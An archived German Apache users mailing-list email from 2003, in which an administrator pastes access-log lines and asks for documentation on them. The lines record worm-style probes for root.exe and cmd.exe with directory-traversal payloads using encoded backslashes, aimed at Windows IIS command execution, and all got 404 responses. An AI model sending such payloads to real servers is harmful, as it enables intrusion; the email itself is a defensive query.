Return-Path: 
 <users-de-return-1778-apmail-httpd-users-de-archive=httpd.apache.org@httpd.apache.org>
Delivered-To: apmail-httpd-users-de-archive@httpd.apache.org
Received: (qmail 21275 invoked by uid 500); 5 May 2003 13:26:03 -0000
Mailing-List: contact users-de-help@httpd.apache.org; run by ezmlm
Precedence: bulk
list-help: <mailto:users-de-help@httpd.apache.org>
list-unsubscribe: <mailto:users-de-unsubscribe@httpd.apache.org>
list-post: <mailto:users-de@httpd.apache.org>
Reply-To: users-de@httpd.apache.org
Delivered-To: mailing list users-de@httpd.apache.org
Received: (qmail 21256 invoked from network); 5 May 2003 13:26:03 -0000
Received: from unknown (HELO mx.net-service-24.de) (80.242.134.55)
  by daedalus.apache.org with SMTP; 5 May 2003 13:26:03 -0000
Received: from pcl-leasing (pD9E279A3.dip.t-dialin.net [217.226.121.163])
	by mx.net-service-24.de (Postfix) with ESMTP id 3E202266CC4
	for <users-de@httpd.apache.org>; Mon,  5 May 2003 15:31:11 +0200 (CEST)
Date: Mon, 5 May 2003 15:25:31 +0200
From: Roland Schmid <apache_ml@net-service-24.de>
X-Mailer: The Bat! (v1.60) Business
X-Priority: 3 (Normal)
Message-ID: <1224530482.20030505152531@net-service-24.de>
To: users-de@httpd.apache.org
Subject: nochmal log file (hackerei)
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-15
Content-Transfer-Encoding: 8bit
X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N

Hallo,

kann mir jemand sagen, wo ich bi�chen Doku zu solchen Log file entries
finde:
80.97.163.36 - - [03/Apr/2003:22:30:49 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278
80.97.163.36 - - [03/Apr/2003:22:30:49 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
80.97.163.36 - - [03/Apr/2003:22:30:52 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
80.97.163.36 - - [03/Apr/2003:22:30:52 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
80.97.163.36 - - [03/Apr/2003:22:30:56 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
80.97.163.36 - - [03/Apr/2003:22:30:56 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
80.97.163.36 - - [03/Apr/2003:22:30:56 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
80.97.163.36 - - [03/Apr/2003:22:30:57 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333

Sieht mir schwer nach Windows als Ziel(hack) System aus.

Gruss Roland


--------------------------------------------------------------------------
                Apache HTTP Server Mailing List "users-de" 
      unsubscribe-Anfragen an users-de-unsubscribe@httpd.apache.org
           sonstige Anfragen an users-de-help@httpd.apache.org
--------------------------------------------------------------------------